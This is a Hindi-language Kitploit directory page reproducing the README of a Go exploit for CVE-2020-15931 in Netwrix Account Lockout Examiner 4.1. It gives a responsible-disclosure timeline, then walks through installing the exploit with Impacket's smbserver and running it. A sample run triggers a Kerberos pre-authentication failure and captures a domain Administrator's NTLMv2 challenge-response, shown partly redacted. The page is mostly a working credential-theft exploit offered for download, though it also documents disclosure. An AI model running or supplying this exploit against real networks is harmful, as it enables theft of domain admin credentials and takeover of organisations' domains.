Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-15931 — Netwrix Account Lockout Examiner 4.1 डोमेन एडमिन खाता क्रेडेंशियल प्रकटीकरण भेद्यता | Kitploit
उपकरण/GitHubGitHub/optiv/cve-2020-15931
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHuboptiv/cve-2020-15931

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 डोमेन एडमिन खाता क्रेडेंशियल प्रकटीकरण भेद्यता

रिपॉजिटरी देखें
2855 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 डोमेन एडमिन खाता क्रेडेंशियल प्रकटीकरण भेद्यता

भेद्यता अवलोकन

Netwrix Account Lockout Examiner (ALE) 5.1 से पहले का संस्करण एक अनधिकृत, दूरस्थ प्रतिद्वंद्वी को हमलावर-नियंत्रित सिस्टम से कनेक्शन ट्रिगर करने और डोमेन व्यवस्थापक विशेषाधिकारों वाले खाते का NTLMv1/v2 चैलेंज-रेस्पॉन्स कैप्चर करने की अनुमति देता है। डोमेन व्यवस्थापक खाता पहले से ही इंस्टॉलेशन के लिए आवश्यक उत्पाद के साथ कॉन्फ़िगर किया गया होगा। एक प्रतिद्वंद्वी डोमेन कंट्रोलर पर एकल Kerberos Pre-Authentication Failed (Event ID 4771) इवेंट उत्पन्न करके इसका शोषण कर सकता है।

भेद्यता के बारे में अधिक विवरण निम्नलिखित ब्लॉग पर पाए जा सकते हैं

image

क्रेडिट्स

यह भेद्यता वास्तविक दुनिया में रॉबर्ट सुरासे (@robsauce) और डैनियल मिन (@bigb0ss), ऑप्टिव सिक्योरिटी कंसल्टेंट्स द्वारा सुरक्षा मूल्यांकन करते समय खोजी गई थी। CVE-2020-15931 की पहचान होने पर, ऑप्टिव ने पहचाने गए दोष को जिम्मेदारीपूर्वक प्रकट करने के लिए तुरंत Netwrix से संपर्क किया।

भेद्यता प्रकटीकरण समयरेखा

  • जून 09, 2020 – ऑप्टिव द्वारा भेद्यता की खोज
  • जून 15, 2020 – ऑप्टिव द्वारा विक्रेता को प्रकट किया गया
  • जुलाई 14, 2020 – विक्रेता ने समस्या स्वीकार की और फिक्स्ड संस्करण जारी करने पर सहमति व्यक्त की
  • जुलाई 23, 2020 – CNA (MITRE Corporation) को प्रकट किया गया
  • जुलाई 24, 2020 – विक्रेता ने Netwrix Account Lockout Examiner 5.1 का फिक्स्ड संस्करण जारी किया
  • जुलाई 24, 2020 – CVE-2020-15931 को CNA (MITRE Corporation) द्वारा निर्दिष्ट किया गया
  • अगस्त 13, 2020 – जनता को प्रकट किया गया
  • अक्टूबर 30, 2020 - NVD (National Vulnerability Database) द्वारा बेस स्कोर 7.5 उच्च निर्दिष्ट किया गया

एक्सप्लॉइट स्क्रिप्ट

इंस्टॉलेशन

एक्सप्लॉइट स्क्रिप्ट गोलंग में विकसित की गई थी। निम्नलिखित निर्भरताएँ इंस्टॉल करें:

root@kitploit:~
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

यह Impacket से smbserver.py का भी उपयोग करता है।

root@kitploit:~
pip install impacket

अंत में, एक्सप्लॉइट स्क्रिप्ट डाउनलोड करें और इसे बिल्ड करें।

root@kitploit:~
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go

उपयोग

root@kitploit:~
$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

 
    Required:
    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    
    Optional:
    -h            Print this help menu

    Example:
    ./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith

एक्सप्लॉइट

(नोट: इस लेखन के समय, इस हमले की पहचान केवल ब्लाइंड-आधारित हमले के माध्यम से की जा सकती है। ऐसा इसलिए है क्योंकि यह निर्धारित करना कठिन है कि लक्ष्य संगठन अपने नेटवर्क पर खाता प्रमाणीकरण की ऑडिट करने के लिए Netwrix Account Lockout Examiner का उपयोग कर रहा है या नहीं।)

root@kitploit:~
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC: 	10.10.0.2
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []

संदर्भ

Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931

टूल डाउनलोड करें